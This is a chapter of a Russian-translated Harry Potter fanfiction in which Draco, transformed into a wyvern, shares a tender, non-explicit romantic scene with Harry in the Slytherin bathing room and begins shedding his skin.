Клятвопреступник (Oath Breaker)

Автор: Goblin Cat KC

Перевод: Weis

Бета: atenas

Оригинал: здесь (разрешение автора на перевод получено)

Рейтинг: R (авторский; PG-15 – переводчика)

Пейринг: Драко Малфой/Гарри Поттер, Люциус Малфой/Северус Снейп

Жанр: драма/приключения

Статус: закончен

Краткое содержание: Малфои предпринимают драматичную эскападу, Драко приходится обучать Гарри темной магии, а все студенты Слизерина исчезают.

Глава 15

Так они и сидели, по пояс в воде, и, вопреки ожиданиям Драко, никто их не беспокоил. Когда стало ясно, что в ближайшее время никто не придет, слизеринец обвил хвост вокруг ноги Гарри и улегся на гриффиндорца, устроив одну руку у него на груди, а другой лениво болтая в воде, стараясь не задеть Гарри когтями. Осмелев, в ответ тот принялся гладить его по голове и по лицу, будто очарованный гладкостью новой кожи Драко. Взяв руку слизеринца, он поднес ее к лицу, стараясь разглядеть в тусклом свете изменившиеся ногти. Приоткрыв глаза, Драко наблюдал за ним. Его короткие когти не представляли из себя ничего особенного, но, похоже,  заинтересовали Гарри больше, чем что-либо, что они изучали на уроках.

- Я не лабораторный образец, - мягко произнес Драко.

Теперь, когда превращение завершилось, ему не нужно было прикладывать усилия, чтобы нормально говорить. Только «с» были немного длиннее и голос резче, но в остальном он разговаривал почти как обычно.

- Прости, - отозвался Гарри, не отпуская его руку. – Ты очень интересный. Ты понимаешь парселтанг?

Драко покачал головой.

- Я виверна, а не змея.

- Я думал, виверны это и есть змеи. Значит, ты дракон?

- Нет, - снова возразил Драко. Открыв глаза, он увидел, как на лице Гарри появилось непонимание. – В виверне соединяются свойства дракона и змеи, но она ни то ни другое.

- Еще один скрещенный вид?

- Да. Ложный дракон, лишенный преимуществ настоящего, зато обладающий всеми его недостатками.

- Вот почему те зеленые уэльские хотели тебя прикончить, - понял Гарри. – Вот почему драконы ненавидят виверн.

«Не совсем» - подумал Драко, но ему не хотелось объяснять, как обидчивы драконы, и потом - Гарри почти угадал. Ящеры считали страшным оскорблением смешение их благородной крови с кровью недостойных змей.

- Но зачем тогда их скрещивать? – удивился Гарри. – Кому нужна змея с крыльями?

«Просто потому что это здорово – суметь сделать такое» - подумал Драко, но не стал произносить это вслух. Вряд ли Гарри понравится такой ответ. И потом, была и другая причина.

- Ни одна ведьма, находясь в здравом уме, не станет спать с драконом. А с виверной – возможно.

Гарри задумчиво нахмурился, но через некоторое время порывисто повернулся к Драко.

- Твой голос теперь звучит по-другому. Не совсем отчетливо, но гораздо понятнее.

Вспомнив, как он сейчас выглядит, Драко смущенно прикрыл рот ладонью.

- Мое тело закончило меняться.

- Значит… изменяется все тело, а не только ноги и кожа, - осторожно взяв слизеринца за подбородок, Гарри прикоснулся к небольшим гребешкам над глазами. – Превращаться больно?

Раньше никто не гладил его надглазные гребни. Ощущения были такими непривычными, что Драко поежился. По чешуе прокатилась рябь, и только через несколько мгновений юноша понял, что Гарри о чем-то его спрашивает. Гриффиндорец повторил вопрос, и в его тоне Драко послышалось что-то похожее на упрек, поэтому, отвечая, он невольно почувствовал себя виноватым.

- Немного. Так иногда бывает, когда растешь слишком быстро.

- Я вас не понимаю, - вздохнул Гарри. – Темная магия не приносит вам ничего кроме боли. Зачем так цепляться за нее?

Драко хотел было огрызнуться, но заботливые нотки в голосе гриффиндорца побудили его ответить честно.

- Она приносит не только боль, - мягко сказал он. – В ней есть много хорошего. Заклинания и чары, которые светлые представить себе не могут. И даже удовольствия, - он посмотрел на Гарри, радуясь, что на этой коже не видно румянца. – Запретные удовольствия, которыми можем наслаждаться только мы.

- Запретные?.. - Гарри сглотнул, - …какие?

- Самые разные, - прошептал Драко, словно опасаясь, что кто-нибудь может подслушать. – Может, как-нибудь ночью ты согласишься отправиться со мной, и мы полетим вместе. Не только ведьмы знают, как получать удовольствие.

Он думал, Гарри захочет узнать больше, но гриффиндорец не стал расспрашивать. Слушая едва слышное потрескивание факелов и плеск, Драко заметил, что вода остыла. Он поежился в теплых объятьях Гарри и теснее прижался к нему. Не сумев сдержаться, он быстро высунул язык, пробуя запах гриффиндорца, и тихонько зашипел.

Укутанный в чужую мантию, он не слышал шагов снаружи, пока они не приблизились к самой двери. Хотя в самом сердце слизеринских владений им вряд ли что-то могло угрожать, Гарри все равно сжал в руке палочку - просто на всякий случай.

Дверь душевой открылась, и по послушно оставшейся в пределах комнаты воде побежала рябь. Драко уткнулся лицом в грудь гриффиндорца. Проникающий снаружи тусклый свет факелов раздражал его чувствительные глаза. Гарри поднял руку, заслоняя его лицо, и слизеринец улыбнулся.

- Драко? – раздался шепот Пэнси. – Ты здесь?

«Глупый вопрос» - подумал юноша и решил не отвечать. Гарри тихонько подтолкнул его, но Драко лишь поворчал и попытался прижаться к нему крепче.

- Драко, я знаю, что ты здесь. Хватит придуриваться, я не в настроении, - раздался плеск, Пэнси зашла внутрь. – Почему вода такая холодная? Ты решил замерзнуть до смерти?

Раздраженно зашипев, Драко сел и вцепился в рубашку Гарри, чтобы удержать равновесие.

- Пэнси, я устал, у меня все болит, я превратился на год раньше и не желаю выслушивать замечания. Проваливай.

- Я бы с удовольствием, если бы ты, избалованный болван, мог сам позаботиться о себе, - отозвалась девушка, включая горячую воду в нескольких кабинках. – Бросил нас в Большом зале, сбежал куда-то с Поттером, нагрубил Дамблдору…

- И спас вас от отравления, зануда, - прошипел Драко.

- Ты должен был это предвидеть, - отрезала девушка. – Нет, ну правда -  отравленные яблоки! Фокус старый, как мир. И это не извиняет того, что ты бросил нас и сбежал куда-то с Поттером! Не знаю, какие коварные планы ты вынашиваешь насчет этого гриффиндорца, но не думай, что я ни о чем не догадываюсь.

- Пэнси, заткнись…

- По крайней мере я надеюсь, что ты вынашиваешь какие-то планы, но, зная тебя…- она подошла к последней кабинке, отдернула занавеску и замерла, увидев Драко, свернувшегося в объятьях Гарри. – Ой…

Драко трагически вздохнул, поморщился от слишком яркого для него света и мрачно уставился на девушку.

- Пэнси, милая, я люблю тебя как сестру, но если ты прямо сейчас не уберешься отсюда, я тебя покусаю.

Несмотря на его резкий тон и недружелюбный оскал, та лишь хмыкнула и, многозначительно изогнув бровь, повернувшись к Гарри.

- А ты что здесь делаешь? Боишься, как бы он не прикончил еще одного шпиона?

- Снейп велел мне присматривать за ним, - не моргнув глазом ответил Гарри. – Как я делал это последние три месяца, пока вас не было.

- Что ж, теперь мы у него есть, - заявила Пэнси, явно задетая таким ответом. – Можешь двигать назад в свою башню.

- Вообще-то, мне и тут хорошо, - деловито откликнулся Гарри. – У нас нет такого замечательного бассейна.

- Слушай, ты…

- Он останется здесь, - рявкнул Драко, хлестнув хвостом по воде. – Если у тебя нет ничего важного, уходи, Пэнси. Пожалуйста, - последнее он добавил только потому, что знал - именно она будет приносить им еду.

Девушка одарила его долгим взглядом, и Драко уже было подумал, что она снова начнет спорить, но в конце концов она вздохнула и покачала головой.

- Ладно, я принесу вам обед. А ты, - она посмотрела на Гарри со смесью угрозы и презрения, словно на противное насекомое, - если хоть что-нибудь ему сделаешь, живым отсюда не выйдешь, понял? – и, не дожидаясь ответа, удалилась, захлопнув за собой дверь.

- Теперь я тебя понимаю, - хмыкнул Гарри. – Когда она злится, с ней лучше не связываться.

- Сейчас она вовсе не злилась, - меланхолично заметил Драко. – И она подогрела для меня воду.

- Почему тебе нужно, чтобы вода была такой горячей? – полюбопытствовал гриффиндорец. – Еще немного - и я просто-напросто сварюсь. Давай-ка закроем краны.

Когда-нибудь Драко выяснит, как Гарри удается задавать такие неудобные вопросы и почему в его устах они звучат так безыскусно, но сейчас он просто высвободился из объятий гриффиндорца и опустился в воду. Его окутало тепло. Он перевернулся на живот, так, чтобы вода покрыла ему спину, и на несколько мгновений погрузился с головой, коснувшись щекой теплых плиток пола. Вода поддерживала его вес, снимая напряжение в спине.  

Пробыв под водой примерно минуту, он приподнял голову, чтобы вдохнуть, повернулся на бок и взглянул на Гарри.

- Пожалуйста, оставь душ включенным. Это тело холоднокровное.

- Постой… - Гарри сел прямо. – Так Пэнси не шутила? Если вода будет слишком холодной, ты можешь умереть?

Вместо ответа Драко лишь пожал плечами.

- Почему ты мне не сказал? – встревоженно спросил гриффиндорец. – Я думал, ты просто не чувствуешь, какая она горячая, ну, как тогда, когда тебе нужно было срочно смыть темную магию.

Смущенный Драко постарался держать хвост под водой, чтобы Гарри не видел, как тот подергивается.

- Ты был достаточно теплым.

Прежде чем гриффиндорец смог ответить, открылась дверь, и по воде побежала рябь. Пэнси левитировала что-то внутрь.

- Обед подан, - крикнула она. – Я потом велю эльфам убрать посуду. И, Поттер, МакГонагалл сказала, что здесь Драко твоя защита ни к чему. Она велела тебе отправляться наверх.

Даже в тусклом свете было видно, как погрустнел Гарри.

- Но, - продолжала Пэнси, - Снейп сказал, что она недооценивает опасности, которыми кишит Хогвартс, и что если ты останешься, о твоих домашних заданиях позаботятся. Так что, ты остаешься?

- Остаюсь, - тут же откликнулся Гарри, - В конце концов, здесь и в самом деле намного безопаснее.

- Как будто Снейп о тебе беспокоится, - пробормотала Пэнси и от всей души хлопнула дверью, что все равно не имело смысла, потому что вода заглушила удар.

Как только она ушла, Гарри высунулся из-за занавески и увидел низенький столик, явно сконструированный с учетом хвоста Драко, на котором стоял их обед - две тарелки с чем-то дымящимся.

- Здорово, - пробормотал он, поднимаясь. – Надеюсь, еда не отравлена.

Когда он отдернул шторку и вышел из кабинки, Драко поморщился и отпрянул подальше от света. Пока они сидели вместе в темноте и Гарри не мог его ясно видеть, все было намного проще. Если сейчас он выползет на свет, то скрыть, как он выглядит, будет невозможно.

- Малфой? – Гарри заметил, что Драко не последовал за ним. – Ты идешь?

- Я… - Драко замялся, уставившись на воду. – Никто никогда не видел меня таким.

- Никто? – ошеломленно переспросил Гарри. – Даже родители?

- Нет. Обычно я пережидаю превращение в ванной. Когда это произошло в первый раз, отец помог мне добраться туда и ушел.

- Он оставил тебя одного? – переспросил Гарри, ужаснувшись. – Сколько тебе было?

- Семь, - ответил Драко и, заметив на лице Гарри отвращение, быстро добавил. – Нет, я просто не хотел, чтобы он видел меня таким!

Гриффиндорец удивленно наклонил голову.

- Тогда почему ты позволил мне остаться?

Драко молчал. Могло ли нежелание оставаться одному считаться достаточной причиной? Можно ли было ради этого открыть секреты темных магов? И не кому-нибудь, а Поттеру? Врагов у Драко было гораздо больше, чем друзей, и у Гарри определенно хватало причин поквитаться. Слизеринец крепче сжал в ладони амулет, но вряд ли маленькая вещица была причиной его явно неразумного поведения.

- Ну же, Мал… Драко, - улыбнулся Гарри и протянул руку. – Идем. Все будет хорошо.

Приглушенный оранжевый свет окрасил кожу Гарри в мягкие полутона. Несколько секунд Драко смотрел на ладонь гриффиндорца, словно на приготовившуюся к нападению ядовитую змею, потом глубоко вздохнул и сжал ее своей. Гарри осторожно потянул его из тени, и он не стал сопротивляться. Впервые в жизни он показался на свету в этом обличии.

Вскоре Драко пришлось отпустить руку гриффиндорца и, моргая, опуститься в воду. Гарри не мог отвести от него взгляда. Свет факелов отражался от чешуи, превращая то, что в тени казалось бледным покровом, в сияющий, белоснежный перламутр. Превращение не сделало слизеринца выше, и это явно причиняло ему неудобства. Хвост Драко был слишком коротким, чтобы поддерживать его, и юноша не мог опираться на него, как делают змеи. Поэтому он не скользил, а полз, помогая себе руками. Только оказавшись за столом, он, казалось, почувствовал себя более-менее удобно, свернув хвост сбоку и придерживаясь за стол одной рукой.

Когда Гарри уселся напротив, Драко посмотрел, что им принесла Пэнси. На тарелке Гарри красовались обычные стейк и картошка, а сам гриффиндорец с любопытством разглядывал маленьких жареных птичек, предназначавшихся Драко.

- Это цыплята? – спросил он.

- Фазанята, - поправил его Драко. – Их мне легче есть.

Чувствуя себя ужасно неуютно под взглядом Гарри, но стесняясь попросить его смотреть в другую сторону, Драко подцепил маленькую тушку двумя пальцами и поднес ко рту. Он не мог раскрывать челюсти, как нормальная змея, но это было и не нужно. Обвив язык вокруг птички, он затянул ее в рот и, слегка откинув голову, проглотил.

- Тебе трудно есть, когда ты такой?

Судя по реакции Гарри, мрачный взгляд, котором его наградил Драко, оказался весьма красноречив.

- Прости, - гриффиндорец вдруг ужасно заинтересовался содержимым своей тарелки. – Я не хотел приставать с дурацкими вопросами…

- Не в этом дело, - быстро возразил Драко, но потом нахмурился. – Ну ладно, в этом тоже, но ничего страшного. Просто мне трудно говорить, когда я ем.

- Я понимаю, - кивнул Гарри. – То есть, я не знаю, каково это, но… может, на этот раз я мог бы ответить на какие-нибудь твои вопросы.

Когда Драко услышал это, ему стало еще больше не по себе. Он не хотел расстраивать Гарри, но…

- Ты не можешь рассказать мне о том, о чем я хочу спросить.

- Что ты имеешь в виду?

- Об Ордене, о котором ты упоминал раньше, - мягко отозвался Драко. –  О том, почему ты бродишь один по ночам. Почему прячешься от… - увидев, как помрачнел его собеседник, он осекся. – Прости. Мне не следовало об этом заговаривать.

Некоторое время Гарри ничего не отвечал. Молчание затянулось, и Драко испугался, что разрушил хрупкое доверие, которое едва установилось между ними. Он глотнул воды, жалея, что это не вино. Когда Гарри, наконец, заговорил, от неожиданности  Драко чуть не выронил стакан.

- Все в порядке, - сказал гриффиндорец. –  Будет нечестно, если я и дальше стану держать это в секрете от тебя, особенно после того, что ты сделал для меня, и что позволил мне увидеть. Но обещай, что никому не скажешь, даже Пэнси.

- Обещаю, - кивнул Драко, подумав мимоходом, что Гарри слишком доверчив, если поверил слову слизеринца, более того – Малфоя. Но он всерьез намеревался сдержать это обещание.

- Орден Феникса – это тайная организация, созданная Дамблдором для борьбы с Волдемортом, - принялся объяснять гриффиндорец. – Она состоит из волшебников, которые не хотят ждать, пока Министерство одумается и решит действовать. Я, вообще-то, не должен быть членом Ордена, потому что я еще несовершеннолетний, но раз уж я постоянно влипаю в неприятности, меня приняли досрочно, в прошлом году.

- Чтобы было легче приглядывать за тобой? – улыбнулся Драко.

- Вроде того. К тому же дом, где находится штаб-квартира, принадлежит мне. Это длинная история. И еще есть пророчество… - Гарри замолчал.

- Пророчество? – переспросил Драко.

- Об этом я и правда не могу говорить, - с раскаяньем произнес Гарри. – Даже в Ордене не все знают.

- Выходит, не только у темных магов есть секреты даже от своих, - хмыкнул Драко.

Гарри горько фыркнул.

– В том, что касается секретов, Дамблдор даст сто очков вперед всем темным магам вместе взятым.

- Что ж, видимо, он не полный идиот, - заметил Драко, подцепляя очередного фазаненка. – Ладно, оставим в покое пророчество. Но ты не рассказал, почему бродишь один по ночам, да еще и вне замка.

Прежде чем ответить, Гарри глотнул сока.

- Надеюсь, Пэнси не отравила мой обед? - спросил он.

Проглотив фазаненка, Драко помотал головой и принялся ждать ответа. Гарри вздохнул и заговорил.

- Когда я бывал один… на улице, на морозном воздухе… мне становилось немного легче. Справляться с зависимостью, я имею в виду. Никто не пялился на меня, не спрашивал, что не так, почему я такой беспокойный. Почему мне не сидится на месте, почему я постоянно кручусь в постели и не могу уснуть. Ведь все знают – Помфри может вылечить бессонницу в два счета. Иногда у меня совершенно пропадал аппетит, а иногда я ел в три раза больше обычного.

- Ты так и не рассказал друзьям, - заключил Драко.

Гарри помотал головой.

- Почему?

Тот пожал плечами.

- Просто не хотел, чтобы они знали.

- Тебе было стыдно? – вдруг понял слизеринец и ошеломленно распахнул глаза. – Но ты же не виноват в том, что случилось.

- Я мог разбить бутылку с зельем об пол, - возразил Гарри, по-прежнему не глядя на него. – Или об стену. Я мог аппарировать, мог… сделать что-нибудь….

- Фенрир обязательно слизал бы его с земли, - покачал головой Драко. – Твое решение было до идиотизма гриффиндорским, но, скорее всего, единственно возможным способом не отдать ему зелье.

- Ты хочешь сказать, слизеринец поступил бы по-другому и оказался не прав? – невесело усмехнулся Гарри. – Снейп так не считает.

- Ты слушаешь, что говорит Северус?  – Драко засмеялся. Когда Гарри мрачно взглянул на него, он прикрыл рот ладонью, но не смог заглушить смех. – Ты же знаешь, что он тебя терпеть не может. Он скажет что угодно, лишь бы уязвить тебя. Вы, гриффиндорцы, слишком доверчивы, - но Гарри выглядел таким грустным, что он перестал смеяться и накрыл ладонь гриффиндорца своей, стараясь не оцарапать его. – Любой слизеринец разбил бы бутылку, просто чтобы успеть спастись самому и вынудить Фенрира слизывать зелье вместе с осколками прямо с земли. Полагаю, иногда вы, гриффиндорцы, можете на что-нибудь сгодиться. И… может, эта твоя зависимость тоже не такая уж плохая вещь. Не будь ее, ты не нашел бы меня тогда, в снегу.

Гарри улыбнулся в ответ. Драко поежился и опустился поглубже в воду. Улыбка гриффиндорца померкла. Он стремительно встал, намочил свою мантию в горячей воде и накинул ее Драко на плечи.

- Замерз?

- Нет. Просто слишком долго сидел, - слизеринец проглотил последнего птенца и, оттолкнувшись от стола, соскользнул в воду. Придерживая мантию Гарри, он оглянулся и поморщился, увидев, как далеко ему предстоит ползти. Хотя спать в той, последней кабинке, было вовсе не обязательно, он предпочитал находиться как можно дальше от двери.

Не успев понять, что происходит, он оказался в воздухе - Гарри поднял его на руки, придерживая под спину и хвост, и прижал к груди. Удивленно зашипев, Драко вцепился в рубашку гриффиндорца, испугавшись, что тот его уронит.

- Не волнуйся, - сказал Гарри. – Так тебе не придется ползти туда. Если, конечно, ты не возражаешь,- неуверенно добавил он.

- Нет, все в порядке, - покачал головой Драко, смутившись еще больше, и уставился вниз, не отваживаясь встретиться с Гарри глазами.

Когда они снова оказались в кабинке и гриффиндорец уселся, Драко ожидал, что тот отпустит его, но Гарри усадил его к себе на колени и задернул занавеску, вернув успокаивающую темноту. Драко подумал, что он замерзнет, но его хвост благополучно находился в горячей воде. К тому же Гарри снял с него свою мантию, намочил ее и, снова хорошенько укутав, приобнял слизеринца за плечи.

- Что ты делаешь? – прошептал Драко.

Сначала Гарри не ответил, лишь притянул его ближе, но Драко уперся рукой ему в грудь, не давая сомкнуть объятья.

- Помнишь наш спор? – тихо спросил Гарри. – Когда мы гонялись за снитчем? Проигравший выполняет желание победителя.

Не в силах вымолвить ни слова, Драко кивнул и вздрогнул, когда Гарри коснулся его щеки и осторожно убрал волосы от лица. Он вдруг очень отчетливо осознал, в каком уязвимом положении находится и какие сильные у Гарри руки. Конечно, у него были клыки и когти, но чувствовал он себя ужасно слабым, а гриффиндорец держал его крепко. Даже если он закричит, помощь не подоспеет вовремя.

- Думаю, я хочу получить мой выигрыш прямо сейчас, - прошептал Гарри.

Он наклонился ближе к Драко, одновременно притянув его к себе. Его губы казались обжигающе горячими на холодной коже Драко. Слизеринец удивился – неужели вода остыла? – потому что все его тело словно охватило огнем. Он вцепился в рубашку гриффиндорца, обвил хвостом его ногу и ответил на поцелуй. Он не отваживался широко открыть рот, опасаясь, что Гарри не понравится касание его раздвоенного языка, боясь не сдержать шипения.

Гарри не стал возражать, когда он отодвинулся, оставаясь в объятьях гриффиндорца, и только через несколько мгновений Драко понял, что кроме поцелуя от него ничего не потребуют.

- Ты мог заставить меня сделать все, что угодно, - нерешительно произнес он. – И все, чего ты хотел – это поцелуй?

- Ну… да, - казалось, Гарри не знает, что еще сказать.

Сначала Драко счел, что Гарри смеется над ним, но тот казался искренним. Потом он подумал, что виной всему амулет, но на такое слабеньких чар не хватило бы. И сам он не сопротивлялся поцелую. Когда молчание стало неуютным, Драко плотнее запахнул мокрую мантию, словно она могла его защитить.

- Тебе не противно? – прошептал он. – Я же полукровка.

- Но ты вовсе не противный, - так же шепотом отозвался Гарри. Он осторожно повернул Драко лицом к себе, но тот упорно отводил взгляд. – Ты красивый.

Драко знал, что скоро Гарри перестанет так думать, но ничего не сказал. Он хотел сполна насладиться моментом, зная, что скоро все закончится. Последствия подождут до завтра. Гриффиндорец продолжал гладить его по голове, и Драко не смог сдержать улыбку. Спустя мгновение он понял, что тот поглаживает и его хвост, осторожно водя пальцами по гладкой чешуе. Слишком уж осторожно.

- Я не сломаюсь, - заметил он.

- Прости, - неуверенно усмехнулся Гарри. – Просто… Ты, случайно, не становишься меньше, когда превращаешься?

- Меньше! – возмущенно прошипел Драко. – Что значит «меньше»? Я вовсе не маленький!

- Ну…

- Поттер!

- Ты не такой уж и большой, - оправдываясь, заявил Гарри, и чуть не засмеялся, когда Драко обнажил клыки – острые, но совсем небольшие. – Правда! Думаю, ты и сам это знаешь – ты же вечно таскаешь за собой Крэбба с Гойлом…

- Маленький или нет, я не стеклянный, - хмуро заявил Драко и раздраженно взмахнул хвостом. Должно быть, во всем виноват амулет. Он никогда не позволял вот так над собой смеяться.

- Ну, если ты настаиваешь, - отозвался Гарри, улыбаясь. Обняв Драко за талию, он притянул его к себе и повернулся так, что их лица оказались совсем рядом. У Драко перехватило дыхание, и когда он на секунду высунул язык, гриффиндорец осторожно придержал его за подбородок и снова поцеловал. Распахнув глаза, Драко изо всех сил старался держать рот закрытым, но Гарри большим пальцем погладил уголок его губ и скользнул внутрь, коснувшись клыков. Драко застонал. Гриффиндорец был слишком теплым и вкусным, чтобы от него оторваться. Раздвоенный язык слизеринца скользнул между губ Гарри, легонько коснувшись его зубов.

Тут же отпрянув, Драко поморщился и прикрыл рот ладонью.

- Прости. Я не хотел…

- Все в порядке, - Гарри отвел его руку. – Мне… мне понравилось.

- Но это… это не… - Драко попытался найти правильные слова и не смог. Нет, он не стыдился собственного тела, но никто никогда не видел его таким, не говоря уже о том, чтобы прикасаться. И если бы Гарри знал, для чего на самом деле нужно это превращение...

- Ты и в самом деле этому веришь, да? – спросил Гарри. – Тому, что люди говорят о полукровках? Ты тогда сказал…

- Я вовсе не стыжусь себя, - не поднимая глаз, резко перебил его Драко, – Но это не для праздных взглядов. И мы не должны позволять касаться нас вот так. Это опасно. Нам следует оставаться в темноте.

- Тогда почему ты позволил мне увидеть тебя? – мягко спросил Гарри, стараясь заглянуть слизеринцу в глаза. – Почему позволил остаться здесь, с тобой?

- Потому что… потому что я хотел… - Драко попытался оттолкнуть его, но не смог, без ног ему было трудно держать равновесие. – Я хотел, чтобы ты остался. 

- Но почему? – не унимался Гарри. – Почему ты захотел, чтобы я был здесь, Драко?

Как на это ответить? Сердце юноши тяжело забилось. Он знал, как ему нужна темная магия, знал сладкую власть, которую она имела над ним и которая отделяла его ото всех остальных. Он не жалел, что родился темным магом, но даже теперь, после возвращения слизеринцев, чувствовал то же бесконечное одиночество, что и в школе, полной светлых магов. Оно сделало милую прежде тьму невыносимо тяжелой. Ему не хотелось жить в свете, но…

- Я не хотел оставаться один в темноте, - наконец прошептал он. – Я хотел, чтобы ты был со мной.

- Я с тобой, - отозвался Гарри и поцеловал его в лоб, потому что Драко упрямо не поднимал головы. – Не спеши избавляться от меня теперь, когда ты меня заполучил.

Драко не знал, откуда и почему появились слезы, но они вдруг потекли у него по лицу, закапали в воду. Когда Гарри ласково погладил его по щеке и провел пальцами по темным кругам у него под глазами, ему стало только хуже.

- Иди сюда, - прошептал гриффиндорец, крепче прижимая его к себе и опускаясь глубже в воду. Прильнув к теплому телу гриффиндорца, наполовину погрузившись в горячую воду, закутанный  в мантию Драко положил голову на плечо Гарри и закрыл глаза. Голова болела от плача, а тело – от слишком долгого сидения. Медленные поглаживания по спине и хвосту навевали на него сон. Он застонал и потряс головой, стараясь стряхнуть дремоту.

- Тебе нужно поспать, - заметил Гарри и накинул капюшон мантии ему на голову, оставив лицо открытым. – Я присмотрю, чтобы вода не остыла.

Драко хотел было сказать, что вода зачарована оставаться горячей, но промолчал, понимая, что Гарри предлагает ему свою защиту и опеку. Какими бы наивными, глупыми и доверчивыми ни были гриффиндорцы, ему пришлось признать, что иногда было очень удобно иметь их под рукой. По крайней мере, этого гриффиндорца. Быстро коснувшись губами шеи Гарри, Драко зевнул и тут же уснул.

Его сон был наполнен образами подводных пещер и горных каверн, темной толщей воды, сквозь которую он плыл безо всяких усилий. Когда он открыл глаза, то обнаружил, что лежит на спине, практически на Гарри, удобно примостившись головой у него на животе. Вода плескалась где-то на уровне груди, но он не боялся соскользнуть вниз, опустив руки по обе стороны от ног гриффиндорца.

Драко сел, придерживая мантию, словно одеяло, и моргнул несколько раз, прежде чем понял, что избавиться от ряби в глазах не получается. Появившаяся на них молочно-белая пленка размывала грани и превращала свет в туманную серость.

- Доброе утро, - произнес Гарри, коснувшись его волос. – Ты пропустил завтрак. Пэнси отказалась оставлять мне мой, сказала, что мне придется подождать тебя.

Вместо ответа Драко полностью соскользнул в воду на несколько секунд. Он мог находиться под водой так же долго, как настоящая виверна – единственное преимущество – но после объятий Гарри горячая толща вовсе не казалась такой уж привлекательной. Поднявшись, он стряхнул воду с волос, и замер, ощутив, как гриффиндорец потянулся. Он не видел, но почувствовал, как заплескалась вода вокруг него, и рука, коснувшаяся его щеки, казалась порождением темноты.

- Драко, что случилось с твоими глазами? – вдруг спросил Гарри, осторожно повернув его лицо к себе. – Они побелели!

- Я превращаюсь не просто так, - неуверенно объяснил Драко. – Я не хотел тебе говорить, потому что это… неприятно.

- О чем ты? – хмыкнул Гарри. – Я столько всего повидал. Не думаю, что ты можешь меня напугать.

Восприняв это как своего рода вызов, Драко с силой потер лицо и невесело улыбнулся, услышав удивленный вздох Гарри. Должно быть сначала это выглядело так, словно он сдирает собственное лицо, но вскоре стало понятно, что это всего лишь слезает кожа. Когда он опустил руку, у него в ладони остался оторвавшийся лоскуток с несколькими чешуйками.

- Ты сбрасываешь кожу? – прошептал Гарри, инстинктивно отшатнувшись от вытянутой руки Драко, но тут заметил у него на щеке обнажившийся участок. Он и раньше думал, что чешуя Драко красива, но новые чешуйки просто-напросто сияли. Гриффиндорец протянул руку, чтобы прикоснуться к ним, но Драко отпрянул и прижался к противоположной стене.

- Драко?

- Не трогай, - быстро сказал тот. – Новая кожа очень чувствительна.

- Это больно? – спросил Гарри, подбираясь ближе. – Но ты тер так сильно.

- Мне приходится так делать, - объяснил слизеринец, - чтобы избавиться от старой оболочки.

Увидев, что Гарри не собирается останавливаться и подбирается все ближе, он испуганно распахнул глаза. Все случилось так быстро, что он не успел ничего сделать. Только что гриффиндорец был на расстоянии вытянутой руки, а в следующее мгновение уже оказался прямо перед ним и взял его лицо в ладони. Драко замер и зажмурился, но вместо боли ощутил, как мозолистые пальцы осторожно пробежались по нежной чешуе и рваной кромке.

- Тебе нужно сбросить всю кожу? – прошептал гриффиндорец. – Сколько времени на это понадобится?

Гарри находился слишком близко. Драко не мог думать, ему казалось, он задыхается. Вытянув руки, он вслепую нашарил плечи гриффиндорца и отодвинул его от себя. Он бы ни за что не удержал его, если бы Гарри это пришлось не по нраву, но тот не стал больше приближаться.

- Что такое? Почему ты?..

- Пожалуйста, - перебил его Драко. – Просто помолчи минутку.

Наступила тишина. Малфой несколько раз глубоко вздохнул. Обычно во время его превращений рядом никого не было, и он не ожидал, что инстинкты напомнят о себе с такой силой. Виверны очень уязвимы во время линьки, их кожа слишком чувствительна, зрение туманно. Находиться в это время рядом с кем-то было настоящим испытанием для его мужества, хотя Драко заметил, что не столько отталкивает Гарри, сколько опирается на него.  

- Обычно у виверн не бывает компании, когда они сбрасывают кожу, - негромко объяснил он. – Я едва тебя вижу. И ты слишком близко…

- Хочешь, чтобы я ушел? – спросил Гарри.

Драко покачал головой.

- Тогда… я сяду возле дальней стены?

Кивнув, слизеринец отпустил его и подождал, пока послышится плеск воды у стены, где устроился гриффиндорец. Только тогда он немного расслабился, задышал спокойнее и отругал себя за панику. Придерживаясь рукой за стену, он отполз в противоположный угол и опустился глубже в воду.

 - Почему ты терпишь меня? – спросил он. – Почему пошел сюда за мной? И не говори, что тебя послал Дамблдор.

- Я пошел, потому что сам хотел, - отозвался Гарри. – Хотел помочь тебе.

- Почему? – требовательно спросил Драко. – Ты же не святой. Я никогда тебе не нравился. Даже ам…- он едва успел зажать себе рот, случайно оцарапав когтем новую кожу. Поттер ни в коем случае не должен узнать про амулет. – Даже то, что я готовлю для вас зелья, еще не повод.

- Ты прав, - ответил Гарри. – Сначала ты мне не нравился. Ты вечно задирал меня и моих друзей, и не менялся. Думаю, ты не называешь никого грязнокровкой только потому, что боишься, как бы я тебя не ударил.

Драко лишь склонил голову. Так оно и было.

Гарри продолжал говорить, и его голос зазвучал задумчиво.

- Я не знаю точно, когда начал относиться к тебе иначе. Мне не было тебя жаль, когда ты был совсем один. И каждый раз, когда ты вел себя со мной достойно, ты давал понять, что хочешь чего-то взамен. Но… потом ты вдруг перестал злобствовать, - он усмехнулся. – Ты даже стал вежливым. Ты показал мне замечательные вещи и никогда мне не лгал. Однажды я вдруг понял, что ты один из немногих людей, кто никогда мне не лжет.

Не сдержавшись, Драко сжал амулет в ладони, словно стараясь спрятать его. В темноте это выглядело так, будто он старается согреться.

- Думаю, это случилось в ту ночь, когда на нас напали, - сказал Гарри, словно размышляя вслух.  – Все хотели тебя убить, и я… я вдруг увидел, как ты напуган. Мне захотелось защитить тебя, - он вздохнул и опустил взгляд. – А в итоге это ты защитил меня.

Драко ничего не сказал.

- Знаешь, когда я потом в вашей спальне ждал, пока ты проснешься, то не думал о драке или о том, что нам теперь делать. Я смотрел, как ты спишь, и мог думать только о том, как ты выглядел, когда разделывал дракона.

- Я выглядел просто жутко, - запротестовал Драко.

- Ты тогда с головы до ног перемазался в крови и так стеснялся этого, что даже не замечал, что пачкаешься еще больше, когда случайно касаешься лица или волос. А потом ты спас мне жизнь…

- Ты же не умирал, - возразил Драко.

- Нет, но когда случаются приступы, это больно, - ответил Гарри. – Когда ты наклонился ко мне, я почувствовал себя в безопасности. Не знаю, почему. Это кажется нелепым, потому что ты… ну…

- Потому что я невообразимый трус? – хмыкнул Драко. – Можешь сказать вслух, это вовсе не секрет.

- Но ты не трус, - возразил Гарри. – Признаюсь, сначала я тоже так думал, но потом ты позволил Дамблдору рассказать всем, что ты темный маг и…

- Это вовсе не было проявлением храбрости. Все время, пока он говорил, я был в ужасе.

Тогда он едва не убежал из зала, наплевав на последствия.

